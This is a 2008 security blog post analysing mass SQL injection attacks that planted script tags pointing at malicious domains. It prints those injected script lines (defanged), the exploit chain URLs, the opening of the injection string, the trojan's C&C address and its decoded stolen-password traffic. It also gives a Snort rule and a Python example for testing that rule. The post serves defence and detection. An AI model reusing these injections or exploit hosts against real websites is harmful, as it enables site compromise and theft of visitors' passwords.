
Thursday, 24 April 2008

Thousands of More Hacked Websites Targeting Your Passwords

Malicious SQL Injection Attacks Continue


Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

Last month we posted a blog entry summarizing attacks involving over 10,000 pages that had been injected with JavaScript pointing back to a single URL. Visitors to these sites would have a barrage of exploits fired at them as the malicious JavaScript attempted to load several different pages. If an attack was successful, the visitor would end up with a program running on their system that stole passwords sent in POST requests from Internet Explorer. Well, it looks like it is déjà vu all over again.

In the past few weeks there have been several more distinct and successful SQL injection attacks against hundreds of websites and tens of thousands of web pages. In particular, an attack involving the domain "nihaorr1.com" has continued to spread over the last week or so. This automated attack SQL injects websites running ASP or ASP.NET and adds the following code to their pages:

	"<script src=hxxp://www.nihaorr1.com/1.js></script>"

Presently there are over 38,000 search results on Google for the above URL, and the number has been growing over the past few days. There are also over 30,000 results for the domain "aspder.com", which was recently injected into thousands of pages as well. A very similar URL was used in those injections:

	"<script src=hxxp://www.aspder.com/1.js></script>"

The website aspder.com has fortunately been offline for a little while now. However, the nihaorr1.com website is still up and serving malicious files.

The Malicious File Trail


Visiting a website with the above mentioned link to 1.js on nihaorr1.com results in the following chain of events:

hxxp://www.nihaorr1.com/1.js writes an iframe to hxxp://www.nihaorr1.com/1.htm

hxxp://www.nihaorr1.com/1.htm contains dangerous VBScript and may lead you to the following URLs by way of iframes:

hxxp://www.nihaorr1.com/Real.gif - Not an image - RealPlayer exploit
hxxp://www.nihaorr1.com/Yahoo.php - File Not Found (404)
hxxp://www.nihaorr1.com/cuteqq.htm - May try to load the following URLs by way of iframes or script references:

 -hxxp://www.nihaorr1.com/Ajax.htm - MDAC Exploit
 -hxxp://www.nihaorr1.com/Ms06014.htm - MDAC Exploit
 -hxxp://www.nihaorr1.com/Real.gif - RealPlayer Exploit
 -hxxp://www.nihaorr1.com/Bfyy.htm - Storm Player Exploit
 -hxxp://www.nihaorr1.com/Lz.htm - Ourgame GLWorld Exploit
 -hxxp://www.nihaorr1.com/Pps.htm - PowerPlayer Control Exploit
 -hxxp://www.nihaorr1.com/XunLei.htm - XunLei Thunder PPlayer Exploit

hxxp://www.nihaorr1.com/Ms07055.htm - File Not Found (404)
hxxp://www.nihaorr1.com/Ms07033.htm - File Not Found (404)
hxxp://www.nihaorr1.com/Ms07018.htm - iframe and javascript references:

 -hxxp://count34.51yes.com/click.aspx?id=345202594&logo=7 - Counter
 -hxxp://gg.haoliuliang.net/one/hao8.htm?036 - MDAC exploit; also attempts to lead to the following files:
  -hxxp://gg.haoliuliang.net/wmwm/a014.js
  -hxxp://gg.haoliuliang.net/wmwm/arl.js
  -hxxp://gg.haoliuliang.net/wmwm/abf.js
  -hxxp://gg.haoliuliang.net/wmwm/alz.htm
  -hxxp://gg.haoliuliang.net/wmwm/anrl.htm
  A successful exploit attempt from any of the above five links results in a download of hxxp://mn.haoyuming.net/mmuu/abd.cab (saved as abd.exe)

hxxp://www.nihaorr1.com/Ms07004.htm - VML Exploit
hxxp://www.nihaorr1.com/Ajax.htm - MDAC Exploit
hxxp://www.nihaorr1.com/Ms06014.htm - MDAC Exploit

Successful exploit attempts from nihaorr1.com result in the download of test.exe from the website. This is another password stealer like the one we found last time. We will discuss it further below.

Interesting Discovery


It turns out this server also houses a file called "123.rar" that is not referenced by any of these links. We discovered it through Google's cache of the site, which apparently had an open directory index at one time. Inside this .rar file are all of the files mentioned above that are presently hosted on nihaorr1.com. However, the copies in the archive are not identical to what the live site serves: they reference "www.nmidahena.com" instead of "nihaorr1.com", so the operator of nihaorr1.com appears to have modified them.

The domain name "nmidahena.com" was also involved in SQL injections over the past month or so. The following familiar code was injected into thousands of websites:

	"<script src=hxxp://www.nmidahena.com/1.js></script>"

A Google query for "<script src=hxxp://www.nmidahena.com/1.js>" turns up over 90,000 results. This domain has since been killed off, and it looks like our attacker has moved on to new ones.

Solving the Mystery of the SQL Injections


For some of the very similar, and possibly directly related, earlier attacks we had some details on what happened. The Internet Storm Center and the ModSecurity website had details on what the SQL injections looked like. However, it was not until a recent posting on the Internet Storm Center's site that we knew how they were being carried out on such a massive and clearly automated scale. In a posting titled "The 10.000 web sites infection mystery solved" they revealed the actual tool behind the attacks. At this point it is still not clear how many people have been using the tool or have been behind the various attacks.

We are not going to post the exact SQL used in these attacks, although it is already available on the web. It still involves the use of CAST statements and generally begins with a line similar to this: "DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST". We are not sure how many false positives it would produce, but it may be worth writing an intrusion detection system (IDS) signature for requests like this arriving at your web server.

The Malware


In the previous blog posting we mentioned that a successfully exploited system would end up with a password stealer on it. This latest set of attacks does the same thing. This time we have a little more information and have created a Snort rule that can be used to detect it. The malware itself performs only a few actions when run. Sandboxing it shows that it deletes the system's HOSTS file and drops a DLL file. It does NOT immediately initiate any network traffic, at least not until Internet Explorer is used. It will not send data to the command and control (C&C) server until a POST request is made from the IE browser. Not only must a POST request be made, but it specifically looks for password fields (<input type="password"/>). If you are not using IE, or are not POSTing a form with a password field, it does not appear to ever communicate with the C&C.

If a password is detected being sent with IE, the trojan immediately sends the information to the C&C IP address 61.188.39.214 on port 2034. This traffic is encoded with a simple substitution cipher and is easily read.

Malware Binary:

File MD5: 4b913be127d648373e511974351ff04e
File Size: 24667 bytes

Malware DLL:

File MD5: 7c50f2ea53e22dd7a8ffa95f1441ec30
File Size: 45056 bytes

Sample output of all the traffic:

This traffic when decoded looks something like this (extraneous parts removed):

sid=wowshehaea&url=hxxp://url&pc=COMPUTERNAME;10.10.10.100;UKOS;M.4&other=text[username]username/password[password]abc123/Ds

Protection & Detection


As a first step, we highly recommend that you block access to the above domains (don't forget gg.haoliuliang.net). We have not been able to access them recently, but that does not mean they will not come back online. There will also certainly be new ones, so be on the lookout for those as well. It is also highly recommended that you block access to 61.188.39.214 on your networks and monitor for dropped packets to this host. This is of course just a cat and mouse game; IP address monitoring is usually only good for a short period of time.

By comparing the traffic we were able to generate repeatedly with the traffic from the last trojan, we were also able to create what looks to be a fairly reliable signature for the Snort IDS. This signature is now live on Emerging Threats.

alert tcp $HOME_NET 1024: -> $EXTERNAL_NET any (msg:"ET TROJAN Agent.kaq Chinese IE Password Stealer Encoded Traffic"; flow:to_server,established; content:"|20 20 20 20 20 00 03 00 06 00|"; depth:10; dsize:>100; reference:url,www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424; classtype:trojan-activity; sid:2008169; rev:2;)

We noticed that the first 10 bytes of the payload appear to always be the same and the packets are generally at least 100 bytes -- length varies based on the URL, computer name, IP address, and POSTed data. The rule could be modified to look for a destination port of 2034, but we've left this as "any" since this port could potentially change at any time.
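To make the rule's matching conditions concrete, here is an added Python example (not Shadowserver's or Emerging Threats' code) that parses the rule's content string from Snort's mixed literal/|hex| notation and applies the three conditions a packet must meet: an ephemeral source port ("$HOME_NET 1024:"), a payload longer than 100 bytes ("dsize:>100"), and the 10-byte content found within the first 10 bytes ("depth:10", which with a 10-byte pattern means offset 0). The packets it checks are constructed, not captures of the trojan; the "flow" keyword is not modelled because it needs TCP state that a bare payload does not carry.

```python
def parse_snort_content(spec):
    """Convert a Snort content string into bytes.

    Text outside pipes is literal; text between |...| is whitespace-separated hex,
    e.g. "ab|00 01|c" -> b"ab\\x00\\x01c".
    """
    out = bytearray()
    for i, part in enumerate(spec.strip('"').split("|")):
        if i % 2 == 0:
            out += part.encode("latin-1")   # literal segment
        else:
            out += bytes.fromhex(part)      # hex segment (fromhex ignores the spaces)
    return bytes(out)


# The values from the ET rule on this page (sid 2008169).
RULE_CONTENT = parse_snort_content('"|20 20 20 20 20 00 03 00 06 00|"')
RULE_DEPTH = 10            # depth:10
RULE_MIN_DSIZE = 101       # dsize:>100
RULE_MIN_SRC_PORT = 1024   # "$HOME_NET 1024:" = client-side ephemeral port


def rule_matches(src_port, payload, content=RULE_CONTENT, depth=RULE_DEPTH):
    """True if a client-to-server TCP payload satisfies the rule's port, size and content checks."""
    if src_port < RULE_MIN_SRC_PORT:
        return False
    if len(payload) < RULE_MIN_DSIZE:
        return False
    # depth:N limits the content search to the first N payload bytes. Because the
    # content is itself 10 bytes long, it can only match at offset 0.
    return content in payload[:depth]


def alerts(packets):
    """Names of the (name, src_port, payload) tuples that would fire the rule."""
    return [name for name, port, payload in packets if rule_matches(port, payload)]


# Constructed test packets (not real trojan traffic): the beacon shape the rule
# describes, and three near misses that each fail exactly one condition.
SAMPLE_PACKETS = [
    ("beacon", 3052, RULE_CONTENT + b"A" * 150),
    ("too short", 3052, RULE_CONTENT + b"A" * 20),
    ("shifted past depth", 3052, b"XXXXX" + RULE_CONTENT + b"A" * 150),
    ("server-side source port", 80, RULE_CONTENT + b"A" * 150),
]

if __name__ == "__main__":
    print("would alert on:", alerts(SAMPLE_PACKETS))
```

Pinning the destination port to 2034 would be a one-line extra check in rule_matches; as the post notes, it is left open here because the port can change without the payload prefix changing.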

Conclusion


It appears that mass SQL injections are something we are going to continue to see for some time. At the moment a small set of people appear to be behind these attacks. However, it most likely won't take long for others to catch on and possibly conduct even more nefarious activities. If your site has fallen victim to one of these attacks, it is not just important that you remove the offending injections; it is even more important that you fix the SQL injection attack vector. If you do not, your website will remain vulnerable to similar or worse attacks.

=>Posted April 24, 2008, at 04:52 AM by Steven Adair